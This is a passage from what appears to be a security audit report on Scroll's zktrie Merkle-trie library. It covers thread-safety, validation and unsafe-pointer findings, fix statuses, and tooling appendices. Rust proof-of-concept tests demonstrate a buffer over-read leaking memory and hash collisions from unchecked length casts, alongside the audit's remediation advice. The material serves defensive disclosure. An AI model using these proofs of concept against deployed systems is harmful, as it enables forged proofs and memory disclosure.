13 | Unnecessary unsafe pointer manipulation in Node.Data() | Undetermined
14 | NewNodeFromBytes does not fully validate its input | Undetermined
15 | init_hash_scheme is not thread-safe | Undetermined
16 | Safe-Rust ZkMemoryDb interface is not thread-safe | Resolved
17 | Some Node functions return the zero hash instead of errors | Undetermined
18 | get_account can read past the buffer | Partially Resolved
19 | Unchecked usize to c_int casts allow hash collisions by length misinterpretation | Resolved

Detailed Fix Review Results

TOB-ZKTRIE-1: Lack of domain separation allows proof forgery
Resolved in PR #11. Domain separation is now performed between leaves, Byte32 values, and several different types of internal branches. Additionally, sequence-length domain separation has been added to HashElems as part of the fixes for finding TOB-ZKTRIE-5. HashElemsWithDomain does not add its own domain separation and is potentially error-prone. It appears to be used correctly, but the Scroll team should consider making HashElemsWithDomain private to prevent misuse.

TOB-ZKTRIE-2: Lack of proof validation causes denial of service on the verifier
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-ZKTRIE-3: Two incompatible ways to generate proofs
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-ZKTRIE-4: BuildZkTrieProof does not populate NodeAux.Value
Resolved in PR #11. The BuildZkTrieProof function now calls ValueHash, which populates NodeAux.

TOB-ZKTRIE-5: Leaf nodes with different values may have the same hash
Resolved in PR #11. NodeHash now uses HandlingElemsAndByte32, which calls HashElems, which adds domain separation based on the length of its input to recursive calls in the internal Merkle tree structure.

TOB-ZKTRIE-6: Empty UpdatePreimage function body
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-ZKTRIE-7: CanonicalValue is not canonical
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-ZKTRIE-8: ToSecureKey and ToSecureKeyBytes implicitly truncate the key
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-ZKTRIE-9: Unused key argument on the bridge_prove_write function
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-ZKTRIE-10: The PreHandlingElems function panics with an empty elems array
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-ZKTRIE-11: The hash_external function panics with integers larger than 32 bytes
Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed.

TOB-ZKTRIE-12: Mishandling of cgo.Handles causes runtime errors
Undetermined.
+6. Empty UpdatePreimage function body Severity: Informational Difficulty: N/A Type: Auditing and Logging Finding ID: TOB-ZKTRIE-6 Target: trie/zk_trie_database.go Description The UpdatePreimage function implementation for the Database receiver type is empty. Instead of an empty function body, the function should either panic with an unimplemented message or log one. This would prevent the function from being used without any warning. func (db *Database) UpdatePreimage([]byte, *big.Int) {} Figure 6.1: zktrie/trie/zk_trie_database.go#19 Recommendations Short term, add an unimplemented message to the function body, through either a panic or message logging. +7. CanonicalValue is not canonical Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-ZKTRIE-7 Target: trie/zk_trie_node.go Description The CanonicalValue function does not generate a unique representation of Node structures: different Nodes can share the same CanonicalValue, and two nodes with the same NodeHash can have different CanonicalValues.
ValuePreimages in a Node can be either uncompressed or compressed (by hashing); the CompressedFlags value indicates which data is compressed. Only the first 24 fields can be compressed, so CanonicalValue truncates CompressedFlags to the first 24 bits. But NewLeafNode accepts any uint32 for the CompressedFlags field of a Node. Figure 7.3 shows how this can be used to construct two different Node structs that have the same CanonicalValue. // CanonicalValue returns the byte form of a node required to be persisted, and strip unnecessary fields // from the encoding (current only KeyPreimage for Leaf node) to keep a minimum size for content being // stored in backend storage func (n *Node) CanonicalValue() []byte { switch n.Type { case NodeTypeParent: // {Type || ChildL || ChildR} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.ChildL.Bytes()...) bytes = append(bytes, n.ChildR.Bytes()...) return bytes case NodeTypeLeaf: // {Type || Data...} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.NodeKey.Bytes()...) tmp := make([]byte, 4) compressedFlag := (n.CompressedFlags << 8) + uint32(len(n.ValuePreimage)) binary.LittleEndian.PutUint32(tmp, compressedFlag) bytes = append(bytes, tmp...) for _, elm := range n.ValuePreimage { bytes = append(bytes, elm[:]...) } bytes = append(bytes, 0) return bytes case NodeTypeEmpty: // { Type } return []byte{byte(n.Type)} default: return []byte{} } } Figure 7.1: This figure shows the CanonicalValue computation. The highlighted code assumes that CompressedFlags is 24 bits. (zktrie/trie/zk_trie_node.go#187–214) // NewLeafNode creates a new leaf node. func NewLeafNode(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) *Node { return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage} } Figure 7.2: Node construction in NewLeafNode (zktrie/trie/zk_trie_node.go#55–58) // CanonicalValue implicitly truncates CompressedFlags to 24 bits. This test should ideally fail. func TestZkTrie_CanonicalValue1(t *testing.T) { key, err := hex.DecodeString("0000000000000000000000000000000000000000000000000000000000000000") assert.NoError(t, err) vPreimage := []zkt.Byte32{{0}} k := zkt.NewHashFromBytes(key) vFlag0 := uint32(0x00ffffff) vFlag1 := uint32(0xffffffff) lf0 := NewLeafNode(k, vFlag0, vPreimage) lf1 := NewLeafNode(k, vFlag1, vPreimage) // These two assertions should never simultaneously pass. assert.True(t, lf0.CompressedFlags != lf1.CompressedFlags) assert.True(t, reflect.DeepEqual(lf0.CanonicalValue(), lf1.CanonicalValue())) } Figure 7.3: A test showing that one can construct different nodes with the same CanonicalValue // PreHandlingElems turn persisted byte32 elements into field arrays for our hashElem // it also has the compressed byte32 func PreHandlingElems(flagArray uint32, elems []Byte32) (*Hash, error) { ret := make([]*big.Int, len(elems)) var err error for i, elem := range elems { if flagArray&(1<<i) != 0 { … } } … } … n.ValuePreimage = make([]zkt.Byte32, preimageLen) curPos := zkt.HashByteLen + 4 if len(b) < curPos+preimageLen*32+1 { return nil, ErrNodeBytesBadSize } … if preImageSize != 0 { if len(b) < curPos+preImageSize { return nil, ErrNodeBytesBadSize } n.KeyPreimage = new(zkt.Byte32) copy(n.KeyPreimage[:], b[curPos:curPos+preImageSize]) } case NodeTypeEmpty: break Figure 14.1: preimageLen and len(b) are not fully checked. (trie/zk_trie_node.go#78–111) Recommendations Short term, add checks of the total byte array length and the preimageLen field to NewNodeFromBytes.
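A minimal sketch of such a check, assuming the encoding implied by CanonicalValue in finding 7 (the 256-field cap comes from the ValuePreimage documentation quoted in appendix C; the helper name is ours):

// validatePreimageLen bounds the preimage count declared in a serialized
// leaf before it is trusted: ValuePreimage holds at most 256 Byte32
// fields, and the buffer must contain preimageLen 32-byte fields plus
// the 1-byte KeyPreimage size marker.
func validatePreimageLen(b []byte, curPos, preimageLen int) error {
	if preimageLen <= 0 || preimageLen > 256 {
		return ErrNodeBytesBadSize
	}
	if len(b) < curPos+preimageLen*32+1 {
		return ErrNodeBytesBadSize
	}
	return nil
}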
Long term, explicitly document the serialization format for nodes, and add tests for incorrectly serialized nodes. +15. init_hash_scheme is not thread-safe Severity: Informational Difficulty: N/A Type: Undefined Behavior Finding ID: TOB-ZKTRIE-15 Target: src/lib.rs, lib.go, c.go, types/hash.go Description zktrie provides a safe-Rust interface around its Go implementation. Safe Rust statically prevents various memory safety errors, including null pointer dereferences and data races. However, when unsafe Rust is wrapped in a safe interface, the unsafe code must provide any guarantees that safe Rust expects. For more information about writing unsafe Rust, consult The Rustonomicon. The init_hash_scheme function, shown in figure 15.1, calls InitHashScheme, which is a cgo wrapper for the Go function shown in figure 15.2. pub fn init_hash_scheme(f: HashScheme) { unsafe { InitHashScheme(f) } } Figure 15.1: src/lib.rs#67–69 // notice the function must use C calling convention //export InitHashScheme func InitHashScheme(f unsafe.Pointer) { hash_f := C.hashF(f) C.init_hash_scheme(hash_f) zkt.InitHashScheme(hash_external) } Figure 15.2: lib.go#65–71 InitHashScheme calls two other functions: first, a C function called init_hash_scheme and, second, another Go function (this time, in the hash module) that is also called InitHashScheme. This second Go function is synchronized with a sync.Once object, as shown in figure 15.3. func InitHashScheme(f func([]*big.Int) (*big.Int, error)) { setHashScheme.Do(func() { hashScheme = f }) } Figure 15.3: types/hash.go#29– However, the C function init_hash_scheme, shown in figure 15.4, performs a completely unsynchronized write to the global variable hash_scheme, which can lead to a data race. void init_hash_scheme(hashF f){ hash_scheme = f; } Figure 15.4: c.go#13–15 Note that the only potential data race comes from multi-threaded initialization, which would contradict the usage recommendation in the README, shown in figure 15.5. We must init the crate with a poseidon hash scheme before any actions: … zktrie_util::init_hash_scheme(hash_scheme); Figure 15.5: README.md#8–24 Recommendations Short term, add synchronization to C.init_hash_scheme, perhaps by using the same sync.Once object as hash.go. Long term, carefully review all interactions between C and Rust, paying special attention to anything mentioned in the “How Safe and Unsafe Interact” section of the Rustonomicon.
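One possible shape of that short-term fix, sketched on the Go side of the cgo boundary (a hedged illustration: the fix could equally live in c.go, and the cgo declarations are assumed from figure 15.2):

var initHashSchemeOnce sync.Once

// InitHashScheme performs the C-side write at most once, so concurrent
// initialization can no longer race on the hash_scheme global.
//export InitHashScheme
func InitHashScheme(f unsafe.Pointer) {
	initHashSchemeOnce.Do(func() {
		C.init_hash_scheme(C.hashF(f))
	})
	zkt.InitHashScheme(hash_external)
}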
+16. Safe-Rust ZkMemoryDb interface is not thread-safe Severity: High Difficulty: High Type: Undefined Behavior Finding ID: TOB-ZKTRIE-16 Target: lib.go, src/lib.rs, trie/zk_trie_database.go Description The Go function Database.Init, shown in figure 16.1, is not thread-safe. In particular, if it is called from multiple threads, a data race may occur when writing to the map. In normal usage, that is not a problem; any user of the Database.Init function is expected to run the function only during initialization, when synchronization is not required. // Init flush db with batches of k/v without locking func (db *Database) Init(k, v []byte) { db.db[string(k)] = v } Figure 16.1: trie/zk_trie_database.go#40–43 However, this function is called by the safe Rust function ZkMemoryDb::add_node_bytes (figure 16.2) via the cgo function InitDbByNode (figure 16.3): pub fn add_node_bytes(&mut self, data: &[u8]) -> Result<(), ErrString> { let ret_ptr = unsafe { InitDbByNode(self.db, data.as_ptr(), data.len() as c_int) }; if ret_ptr.is_null() { Ok(()) } else { Err(ret_ptr.into()) } } Figure 16.2: src/lib.rs#171–178 // flush db with encoded trie-node bytes //export InitDbByNode func InitDbByNode(pDb C.uintptr_t, data *C.uchar, sz C.int) *C.char { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.DecodeSMTProof(bt) if err != nil { return C.CString(err.Error()) } else if n == nil { //skip magic string return nil } hash, err := n.NodeHash() if err != nil { return C.CString(err.Error()) } db.Init(hash[:], n.CanonicalValue()) return nil } Figure 16.3: lib.go#147–170 Safe Rust is required to never invoke undefined behavior, such as data races. When wrapping unsafe Rust code, including FFI calls, care must be taken to ensure that safe Rust code cannot invoke undefined behavior through that wrapper. (Refer to the “How Safe and Unsafe Interact” section of the Rustonomicon.) Although add_node_bytes takes &mut self, and thus cannot be called from more than one thread at once, a second reference to the database can be created in a way that Rust’s borrow checker cannot track, by calling new_trie. Figures 16.4, 16.5, and 16.6 show the call trace by which a pointer to the Database is stored in the ZkTrieImpl. pub fn new_trie(&mut self, root: &Hash) -> Option<ZkTrie> { let ret = unsafe { NewZkTrie(root.as_ptr(), self.db) }; if ret.is_null() { None } else { Some(ZkTrie { trie: ret }) } } Figure 16.4: src/lib.rs#181–189 func NewZkTrie(root_c *C.uchar, pDb C.uintptr_t) C.uintptr_t { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) root := C.GoBytes(unsafe.Pointer(root_c), 32) zktrie, err := trie.NewZkTrie(*zkt.NewByte32FromBytes(root), db) if err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(zktrie)) } Figure 16.5: lib.go#174–185 func NewZkTrieImpl(storage ZktrieDatabase, maxLevels int) (*ZkTrieImpl, error) { return NewZkTrieImplWithRoot(storage, &zkt.HashZero, maxLevels) } // NewZkTrieImplWithRoot loads a new ZkTrieImpl. If in the storage already exists one // will open that one, if not, will create a new one. func NewZkTrieImplWithRoot(storage ZktrieDatabase, root *zkt.Hash, maxLevels int) (*ZkTrieImpl, error) { mt := ZkTrieImpl{db: storage, maxLevels: maxLevels, writable: true} mt.rootHash = root if *root != zkt.HashZero { _, err := mt.GetNode(mt.rootHash) if err != nil { return nil, err } } return &mt, nil } Figure 16.6: trie/zk_trie_impl.go#56–72 Then, by calling add_node_bytes in one thread and ZkTrie::root() or some other method that calls Database.Get() in another, one can trigger a data race from safe Rust. Exploit Scenario A Rust-based library consumer uses threads to improve performance. Relying on Rust’s type system, they assume that thread safety has been enforced, and they run ZkMemoryDb::add_node_bytes in a multi-threaded scenario. A data race occurs and the system crashes. Recommendations Short term, add synchronization to Database.Init, such as by calling db.lock.Lock().
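A minimal sketch of that fix, assuming Database already carries the lock field that db.lock.Lock() refers to:

// Init stores an encoded trie node; taking the database lock means that
// concurrent callers (e.g., ZkMemoryDb::add_node_bytes racing with a
// reader) can no longer corrupt the underlying map.
func (db *Database) Init(k, v []byte) {
	db.lock.Lock()
	defer db.lock.Unlock()
	db.db[string(k)] = v
}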
Long term, carefully review all interactions between C and Rust, paying special attention to guidance in the “How Safe and Unsafe Interact” section of the Rustonomicon. +17. Some Node functions return the zero hash instead of errors Severity: Informational Difficulty: N/A Type: Error Reporting Finding ID: TOB-ZKTRIE-17 Target: lib.go, trie/zk_trie_node.go Description The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in figure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149–155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in figure 17.2. func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160–163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values. 18. get_account can read past the buffer Severity: High Difficulty: Medium Type: Data Exposure Finding ID: TOB-ZKTRIE-18 Target: lib.rs Description The public get_account function assumes that the provided key corresponds to an account key. However, if the function is instead called with a storage key, it will cause an out-of-bounds read that could leak secret information. In the Rust implementation, leaf nodes can have two types of values: accounts and storage. Account values have a size of either 128 or 160 bytes, depending on whether they include one or two code hashes. On the other hand, storage values always have a size of 32 bytes. The get_account function takes a key and returns the account associated with it. In practice, it computes the value pointer associated with the key and reads 128 or 160 bytes at that address. If the key contains a storage value rather than an account value, then get_account reads 96 or 128 bytes past the buffer. This is shown in figure 18.4. // get account data from account trie pub fn get_account(&self, key: &[u8]) -> Option<AccountData> { self.get::<ACCOUNTSIZE>(key).map(|arr| unsafe { std::mem::transmute::<[u8; FIELDSIZE * ACCOUNTFIELDS], AccountData>(arr) }) } Figure 18.1: get_account calls get with type ACCOUNTSIZE and key. (zktrie/src/lib.rs#230–235) // all errors are reduced to "not found" fn get<const T: usize>(&self, key: &[u8]) -> Option<[u8; T]> { let ret = unsafe { TrieGet(self.trie, key.as_ptr(), key.len() as c_int) }; if ret.is_null() { None } else { Some(must_get_const_bytes::<T>(ret)) } } Figure 18.2: get calls must_get_const_bytes with type ACCOUNTSIZE and the pointer returned by TrieGet. (zktrie/src/lib.rs#214–223) fn must_get_const_bytes<const T: usize>(p: *const u8) -> [u8; T] { let bytes = unsafe { std::slice::from_raw_parts(p, T) }; let bytes = bytes .try_into() .expect("the buf has been set to specified bytes"); unsafe { FreeBuffer(p.cast()) } bytes } Figure 18.3: must_get_const_bytes calls std::slice::from_raw_parts with type ACCOUNTSIZE and pointer p to read ACCOUNTSIZE bytes from pointer p.
(zktrie/src/lib.rs#100–107) #[test] fn get_account_overflow() { let storage_key = hex::decode("0000000000000000000000000000000000000000000000000000000000000000") .unwrap(); let storage_data = [10u8; 32]; init_hash_scheme(hash_scheme); let mut db = ZkMemoryDb::new(); let root_hash = Hash::from([0u8; 32]); let mut trie = db.new_trie(&root_hash).unwrap(); trie.update_store(&storage_key, &storage_data).unwrap(); println!("{:?}", trie.get_account(&storage_key).unwrap()); } // Sample output (picked from a sample of ten runs): // [[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10], [160, 113, 63, 0, 2, 0, 0, 0, 161, 67, 240, 40, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 158, 63, 0, 2, 0, 0, 0, 17, 72, 240, 40, 1, 0, 0, 0], [16, 180, 85, 254, 1, 0, 0, 0, 216, 179, 85, 254, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] Figure 18.4: This is a proof-of-concept demonstrating the buffer over-read. When run with cargo test get_account_overflow -- --nocapture, it prints 128 bytes, with the last 96 bytes being over-read. Exploit Scenario Suppose the Rust program leaves secret data in memory. An attacker can interact with the zkTrie to read secret data out-of-bounds. Recommendations Short term, have get_account return an error when it is called on a key containing a storage value. Additionally, this logic should be moved to the Go implementation instead of residing in the Rust bindings. Long term, review all unsafe code, especially code related to pointer manipulation, to prevent similar issues.
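To illustrate the short-term recommendation, a sketch of the kind of guard the bindings could apply (hypothetical: it assumes a TrieGetSize binding that reports the stored value's byte length, with a signature of our choosing; the actual fix in PR #13 validates the slice length instead):

// Reinterpret the stored value as an account only if it has one of the
// two valid account sizes (128 or 160 bytes); a 32-byte storage value
// is rejected instead of being over-read.
pub fn get_account_checked(trie: &ZkTrie, key: &[u8]) -> Option<AccountData> {
    let size = unsafe { TrieGetSize(trie.trie, key.as_ptr(), key.len() as c_int) };
    if size != 128 && size != 160 {
        return None;
    }
    trie.get_account(key)
}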
19. Unchecked usize to c_int casts allow hash collisions by length misinterpretation Severity: High Difficulty: Medium Type: Data Validation Finding ID: TOB-ZKTRIE-19 Target: lib.rs Description A set of unchecked integer casting operations can lead to hash collisions and runtime errors reachable from the public Rust interface. The Rust library regularly needs to convert the length of an input byte array from the usize type to the c_int type. Depending on the architecture, these types might differ in size and signedness. This difference allows an attacker to provide an array with a maliciously chosen length that will be cast to a different number. The attacker can craft an array whose length is cast to a smaller value than the actual array length, allowing the attacker to create two leaf nodes from different byte arrays that result in the same hash. The attacker is also able to cast the value to a negative number, causing a runtime error when the Go library calls the GoBytes function. The issue is caused by the explicit and unchecked cast using the as operator and occurs in the ZkTrieNode::parse, ZkMemoryDb::add_node_bytes, ZkTrie::get, ZkTrie::prove, ZkTrie::update, and ZkTrie::delete functions (all of which are public). Figure 19.1 shows ZkTrieNode::parse: impl ZkTrieNode { pub fn parse(data: &[u8]) -> Self { Self { trie_node: unsafe { NewTrieNode(data.as_ptr(), data.len() as c_int) }, } } Figure 19.1: zktrie/src/lib.rs#133–138 To achieve a collision for nodes constructed from different byte arrays, first observe that (c_int::MAX as usize) * 2 + 2 is 0 when cast to c_int. Thus, creating two nodes that share the same prefix and are then padded with different bytes of that length will cause the Go library to interpret only the common prefix of these nodes. The following test showcases this exploit. #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); // common prefix let nd = &hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap(); // create node1 with prefix padded by zeroes let mut vec_nd = nd.to_vec(); let mut zero_padd_data = vec![0u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut zero_padd_data); let node1 = ZkTrieNode::parse(&vec_nd); // create node2 with prefix padded by ones let mut vec_nd = nd.to_vec(); let mut one_padd_data = vec![1u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut one_padd_data); let node2 = ZkTrieNode::parse(&vec_nd); // create node3 with just the prefix let node3 = ZkTrieNode::parse(&hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap()); // all hashes are equal assert_eq!(node1.node_hash(), node2.node_hash()); assert_eq!(node1.node_hash(), node3.node_hash()); } Figure 19.2: A test showing three different leaf nodes with colliding hashes This finding also allows an attacker to cause a runtime error by choosing a data array with a length that causes the cast to result in a negative number. Figure 19.3 shows a test that triggers the runtime error for the parse function: #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); let data = vec![0u8; c_int::MAX as usize + 1]; println!("{:?}", data.len() as c_int); let _nd = ZkTrieNode::parse(&data); } // running 1 test // -2147483648 // panic: runtime error: gobytes: length out of range // goroutine 17 [running, locked to thread]: // main._Cfunc_GoBytes(...) // _cgo_gotypes.go:102 // main.NewTrieNode.func1(0x14000062de8?, 0x80000000) // /zktrie/lib.go:78 +0x50 // main.NewTrieNode(0x14000062e01?, 0x2680?) // /zktrie/lib.go:78 +0x1c Figure 19.3: A test that triggers the issue, whose output shows the reinterpreted length of the array Exploit Scenario An attacker provides two different byte arrays that have the same node_hash, breaking the assumption that such nodes are hard to obtain. Recommendations Short term, have the code perform the cast in a checked manner by using the c_int::try_from method to allow validating whether the conversion succeeds. Determine whether the Rust functions should allow arbitrary-length inputs; document the length requirements and assumptions. Long term, regularly run Clippy in pedantic mode to find and fix all potentially dangerous casts.
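A minimal sketch of the recommended checked conversion (the helper name and error type are ours, not the library's):

use std::os::raw::c_int;

// Convert a buffer length to c_int, surfacing an error instead of
// silently wrapping to a smaller or negative value.
fn checked_c_int(len: usize) -> Result<c_int, String> {
    c_int::try_from(len).map_err(|_| format!("input of {len} bytes exceeds c_int::MAX"))
}

Callers such as ZkTrieNode::parse would then propagate the error (for example, by returning Result<Self, ErrString>) rather than constructing a node from a misinterpreted length.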
A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
Vulnerability Categories
Category Description
Access Controls: Insufficient authorization or assessment of rights
Auditing and Logging: Insufficient auditing of actions or logging of problems
Authentication: Improper identification of users
Configuration: Misconfigured servers, devices, or software components
Cryptography: A breach of system confidentiality or integrity
Data Exposure: Exposure of sensitive information
Data Validation: Improper reliance on the structure or values of data
Denial of Service: A system failure with an availability impact
Error Reporting: Insecure or insufficient reporting of error conditions
Patching: Use of an outdated software package or library
Session Management: Improper identification of authenticated users
Testing: Insufficient test methodology or test coverage
Timing: Race conditions or other order-of-operations flaws
Undefined Behavior: Undefined behavior triggered within the system
Severity Levels
Severity Description
Informational: The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined: The extent of the risk was not determined during this engagement.
Low: The risk is small or is not one the client has indicated is important.
Medium: User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High: The flaw could affect numerous users and have serious reputational, legal, or financial implications.
Difficulty Levels
Difficulty Description
Undetermined: The difficulty of exploitation was not determined during this engagement.
Low: The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium: An attacker must write an exploit or will need in-depth knowledge of the system.
High: An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.
B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document.
Code Maturity Categories
Category Description
Arithmetic: The proper use of mathematical operations and semantics
Complexity Management: The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management: The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Data Handling: The safe handling of user inputs and data processed by the system
Documentation: The presence of comprehensive and readable codebase documentation
Maintenance: The timely maintenance of system components to mitigate risk
Memory Safety and Error Handling: The presence of memory safety and robust error-handling mechanisms
Testing and Verification: The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage
Rating Criteria
Rating Description
Strong: No issues were found, and the system exceeds industry standards.
Satisfactory: Minor issues were found, but the system is compliant with best practices.
Moderate: Some issues that may affect system safety were found.
Weak: Many issues that affect system safety were found.
Missing: A required component is missing, significantly affecting system safety.
Not Applicable: The category is not applicable to this review.
Not Considered: The category was not considered in this review.
Further Investigation Required: Further investigation is required to reach a meaningful conclusion.
C. Code Quality Findings We identified the following code quality issues through manual and automatic code review. ● Unnecessary parentheses on function call // NewSecure creates a trie // SecureBinaryTrie bypasses all the buffer mechanism in *Database, it directly uses the // underlying diskdb func NewZkTrie(root zkt.Byte32, db ZktrieDatabase) (*ZkTrie, error) { maxLevels := NodeKeyValidBytes * 8 tree, err := NewZkTrieImplWithRoot((db), zkt.NewHashFromBytes(root.Bytes()), maxLevels) Figure C.1: zktrie/trie/zk_trie.go#49–54 ● Typo in code comment // reduce 2 fieds into one Figure C.2: types/util.go#L8-L8 ● Copy-pasted code comment // ErrNodeKeyAlreadyExists is used when a node key already exists. ErrInvalidField = errors.New("Key not inside the Finite Field") Figure C.3: zktrie/trie/zk_trie_impl.go#20–21 ● Empty if branch if e != nil { //fmt.Println("err on NodeTypeEmpty mt.addNode ", e) } return r, e Figure C.4: zktrie/trie/zk_trie_impl.go#190–193 ● Superfluous nil error check if err != nil { return err } return nil Figure C.5: zktrie/trie/zk_trie_impl.go#120– ● Potential panic in function returning Result. Instead, the function should return a Result with the appropriate message. pub fn update_account( &mut self, key: &[u8], acc_fields: &AccountData, ) -> Result<(), ErrString> { let acc_buf: &[u8; FIELDSIZE * ACCOUNTFIELDS] = unsafe { let ptr = acc_fields.as_ptr(); ptr.cast::<[u8; FIELDSIZE * ACCOUNTFIELDS]>() .as_ref() .expect("casted ptr can not be null") Figure C.6: zktrie/src/lib.rs#279–288 ● Typo in code comment // ValuePreimage can store at most 256 byte32 as fields (represnted by BIG-ENDIAN integer) Figure C.7: “represnted” should be “represented” (zktrie/trie/zk_trie_node.go#41) ● Redundant error handling. The following code should simply check whether err != nil and then return nil, err. if err == ErrKeyNotFound { return nil, ErrKeyNotFound } else if err != nil { return nil, err } Figure C.8: zktrie/trie/zk_trie_impl.go#508–512 ● Typo in variable name. The variables should read FIELD instead of FILED. static FILED_ERROR_READ: &str = "invalid input field"; static FILED_ERROR_OUT: &str = "output field fail"; Figure C.9: zktrie/src/lib.rs#309–310 ● The difference between NewHashFromBytes and NewHashFromCheckedBytes is not explicitly documented. NewHashFromBytes truncates its input, while NewHashFromCheckedBytes returns an error if the input is the wrong length. // NewHashFromBytes returns a *Hash from a byte array considered to be // a represent of big-endian integer, it swapping the endianness // in the process. func NewHashFromBytes(b []byte) *Hash { var h Hash copy(h[:], ReverseByteOrder(b)) return &h } // NewHashFromCheckedBytes is the intended method to get a *Hash from a byte array // that previously has ben generated by the Hash.Bytes() method. so it check the // size of bytes to be expected length func NewHashFromCheckedBytes(b []byte) (*Hash, error) { if len(b) != HashByteLen { return nil, fmt.Errorf("expected %d bytes, but got %d bytes", HashByteLen, len(b)) } return NewHashFromBytes(b), nil } Figure C.10: types/hash.go#111–128 ● Unclear comment. The “create-delete issue” should be documented. //mitigate the create-delete issue: do not delete unexisted key Figure C.11: trie/zk_trie.go#118 ● TrieDelete swallows errors. This error should be propagated to the Rust bindings like other error returns; a sketch of the corrected export follows this list. // delete leaf, silently omit any error //export TrieDelete func TrieDelete(p C.uintptr_t, key_c *C.uchar, key_sz C.int) { h := cgo.Handle(p) tr := h.Value().(*trie.ZkTrie) key := C.GoBytes(unsafe.Pointer(key_c), key_sz) tr.TryDelete(key) } Figure C.12: lib.go#243–
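A hedged sketch of that propagation, mirroring the *C.char error convention that InitDbByNode uses in figure 16.3:

// TrieDelete reports failures to the caller instead of dropping them.
//export TrieDelete
func TrieDelete(p C.uintptr_t, key_c *C.uchar, key_sz C.int) *C.char {
	h := cgo.Handle(p)
	tr := h.Value().(*trie.ZkTrie)
	key := C.GoBytes(unsafe.Pointer(key_c), key_sz)
	if err := tr.TryDelete(key); err != nil {
		return C.CString(err.Error())
	}
	return nil
}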
D. Automated Analysis Tool Configuration As part of this assessment, we used the tools described below to perform automated testing of the codebase. D.1. golangci-lint We used the static analyzer aggregator golangci-lint to quickly analyze the codebase. D.2. Semgrep We used the static analyzer Semgrep to search for weaknesses in the source code repository. Note that these rule sets will output repeated results, which should be ignored. git clone git@github.com:dgryski/semgrep-go.git git clone https://github.com/0xdea/semgrep-rules semgrep --metrics=off --sarif --config p/r2c-security-audit semgrep --metrics=off --sarif --config p/trailofbits semgrep --metrics=off --sarif --config https://semgrep.dev/p/gosec semgrep --metrics=off --sarif --config https://raw.githubusercontent.com/snowflakedb/gosnowflake/master/.semgrep.yml semgrep --metrics=off --sarif --config semgrep-go semgrep --metrics=off --sarif --config semgrep-rules Figure D.1: The commands used to run Semgrep D.3. CodeQL We analyzed the Go codebase with Trail of Bits’s private CodeQL queries. We recommend that Scroll review CodeQL’s licensing policies if it intends to run CodeQL. # Create the go database codeql database create codeql.db --language=go # Run all go queries codeql database analyze codeql.db --additional-packs ~/.codeql/codeql-repo --format=sarif-latest --output=codeql_tob_all.sarif -- tob-go-all Figure D.2: Commands used to run CodeQL D.4. go cover We ran the go cover tool with the following command on both the trie and types folders to obtain a test coverage report: go test -cover -coverprofile c.out && go tool cover -html=c.out Note that this needs to be run separately for each folder. D.5. cargo audit This tool audits Cargo.lock against the RustSec advisory database. This tool did not reveal any findings but should be run every time new dependencies are included in the codebase. D.6. cargo-llvm-cov cargo-llvm-cov generates Rust code coverage reports. We used the cargo llvm-cov --open command to generate a coverage report for the Rust tests. D.7. Clippy The Rust linter Clippy can be installed using rustup by running the command rustup component add clippy. Invoking cargo clippy --workspace -- -W clippy::pedantic in the root directory of the project runs the tool. Clippy’s warnings about casting operations from usize to c_int led to finding 